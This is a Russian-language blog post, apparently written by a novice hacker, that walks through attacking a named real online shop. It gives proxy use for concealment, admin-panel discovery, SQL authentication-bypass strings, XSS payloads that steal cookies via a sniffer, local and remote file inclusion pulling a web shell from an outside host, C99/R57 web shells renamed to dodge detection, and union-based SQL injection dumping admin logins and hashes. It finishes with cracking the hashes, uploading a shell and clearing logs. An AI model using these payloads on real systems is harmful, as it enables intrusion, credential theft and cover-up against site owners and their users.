Как разблокировать аккаунты, защитить компьютер и стать хакером
Полезные инструменты

Ваш IP

Узнай свой IP адрес

Проверить сайт

Test tools by WebSitePulse

Генератор MD5

1. Введите строку Строка:


2. Копировать MD5:

Реклама

интернетВсем привет!Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего! Сегодня я хочу новичкам рассказать как надо обращатся с сайтом! P.S Не судите строго это моя первая статья!
Так поехали!Жертва станет shop.iskusnitsa.ru!
Первым делом мы ставим сайтег на какой-нить сканер, и сами начинаем проверять РУКАМИ!!!Начнем с обследования сайта.
1:НАПЯЛИВАЕМ ПРОКСИ!!!Элиту есть такая прога как proxyswitcher! Вот ее советую, т.к. сам юзаю!Потом заходим на 2ip.ru;leader.ru;myip.ru и проверяемся если написано , что типо это не настоящий айпи а роутера и т.п. то меняем а если все норм приступаем!
2:Так походим по сылкам посмотрим где что и как переменые передаются!Сделали.
3:Где админка находится(чаще всего /admin /manager /webroot /administration /administrator) И надо посмотреть /robots.txt на многих сайтах этот документ есть — там много что интересного!:) И пробуем /phpinfo.php Этот файлик хорош!:)Там тож много интересного
4:Пробуем такие фишки в логин как- ‘ or 1=1/* , ‘ or ‘a’=’a/* , admin’# Это SQL авторизация !admin’# Сайт читает все до ‘ а остальное отбрасывает как комент # есть еще коменты как /* —
5:Смотрим на XSS пишем в поиск {script}alert(){/script} или {font color=red}12331414414 Кароче если {script}alert(){/script} или {font color=red} не знаете что это обозначает то идем сюда google.ru и пишем ХТМЛ основы!Потом JS основы!Вот а если вы поняли эти строки то двигаемся дальше!5(а)Если выскочила табличка или поменялись цвета,то пишем {script}СНИФЕР+document.cookie{/script}Снифер онлайн лучше я думаю:)Hacker-pro.net xaknet.ru Там раздел сниферы! так полученный результат в поиске суем админу чтоб он зашел на эту страницу ТАК это называется ПАССИВКА XSS! МОжно,если в коментах XSS то там тоже ставим снифер, А ЭТО УЖЕ АКТИВНАЯ XSS!Кто понял различие:)?Красава!Пасивку мы кидаем жертве, а активную она сама зайдет будь это коменты или гостевухы и т.п.!
6:Если где-нибудь находим переменные и т.п. типа …../index.php?p=чему-нибудь то пробуем место чего-нибудь поставить sdfspfjscmawe Если выпадает ошибка Warning:include…… это PHP-include!Бывают локальные и обычный 6(а):Если локальный то можно смотреть дирректорие!Например:index.php?p=etc/passwd Очень часто сервер сам приписывает .php .html .shtml .phtml и т.п. Надо это убрать!А как?Просто в природе есть Ядовитые нули или NULL-byte %00 он отсекает остальное ТО ЕСТЬ index.php=etc/passwd%00, ../-вверх дир!А если у нас не локальная, а обычная -6(б) то делаем так index.php?p=наш сайт.ru/shell.php(заметьте что успешность зависит от шелла)Если о5 же Сайт приписывает .php….То мы указываем без оканчания шелла смотрим index.php?p=http://xakep.narod.ru/shell и все, а если не приписывает то так index.php?p=http://xakep.narod.ru/shell.php Совет:регайся на народе!И там разводи шелики!Совет:ЮЗАЙ С99 | R57 Самое то!(Commands: cat -Просмотр чего-то(исходник) find(найти) ls(просмотр директорий) ls впринципе тебе не надо будет:) id-просмотр своих прав вот основные комманды)Совет:На народе я нашел что-то типо антибан за вирусы и т.п. в нашем случае шелл шелл-это типо можно считать бэкдор!Система народа агрится на c99.php r57.php shell.php Попробуй переименовать на adjklkx.php!
Далее-
7:Попробуем в поиск поставить следущее aa’) Ииииииииииииии хопачки!Вы дало скулю!Это хорошо самая распространенная бага:)
8:Пишем следущее aa’) order by 10/* (Нигде не ставим + друзья новички это мы ставим токо в адресной строки! )!Так страница загрузилась!Идем дальше!aa’) order by 20/*Ошибка берем 15! aa’) order by 13/*Отобразилась терь истина 14!aa’) order by 14/*Ошибка значит 13полей!Делаем такой запросик aa’) union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*Видим 3 4 5 выводимые поля!Теперь узнаем версию БД это у нас VERSION() aa’) union select 1,2,3,VERSION(),5,6,7,8,9,10,11,12,13/*Ггггг НОВИЧКИ не хватает места НАДО ЛЕЗТЬ В СУРС страницы и искать поиск и там найдете maxlength=50 50 меняете на 9000!Терь все норм и видим что -5 версия =>есть шема! Делаем такой запрос aa’) union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13 from information_schema.tables/* Листаем и видим SITE_admin! Теперь мы делаем последний запросик aa’) union select 1,2,login,password,email,6,7,8,9,10,11,12,13 from site_admin/*Ух ты 2админа 1стандарт manager а другой дядько лох)))))и там их хеши!И ящики!И логины!Такася идем на google.com и вбиваем passwordpro и скачиваем,а у кого есть не надо!Так вставляем хеш!И ура у нас ПАСС от админки!Терь заходим в админку заливаем шелл!И чистим логи(со своим айпи — прокси)
P.S Новички не надо лишних вопросов про SQL XSS PHP есть товарищ как ГУГЛ:)

Скорость печати
Набирайте отображаемый текст и вы узнаете вашу скорость набора текста


Рейтинг@Mail.ru


Copyright © 2024 Как разблокировать аккаунт. Все права защищены.